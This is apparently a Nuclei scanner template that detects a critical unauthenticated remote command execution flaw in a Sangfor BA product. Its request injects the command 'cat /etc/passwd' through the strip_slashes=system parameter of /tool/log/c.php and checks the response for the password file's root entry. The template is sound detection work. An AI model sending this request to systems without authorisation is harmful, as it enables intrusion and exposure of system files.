25 lines
545 B
YAML
25 lines
545 B
YAML
|
id: sangfor-ba-rce
|
||
|
|
||
|
info:
|
||
|
name: Sangfor BA RCE
|
||
|
author: ritikchaddha
|
||
|
severity: critical
|
||
|
description: A vulnerability in Sangfor product allows remote unauthenticated users to cause the product to execute arbitrary commands.
|
||
|
tags: rce,sangfor
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/tool/log/c.php?strip_slashes=system&host=cat+/etc/passwd"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:.*:0:0:"
|
||
|
part: body
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|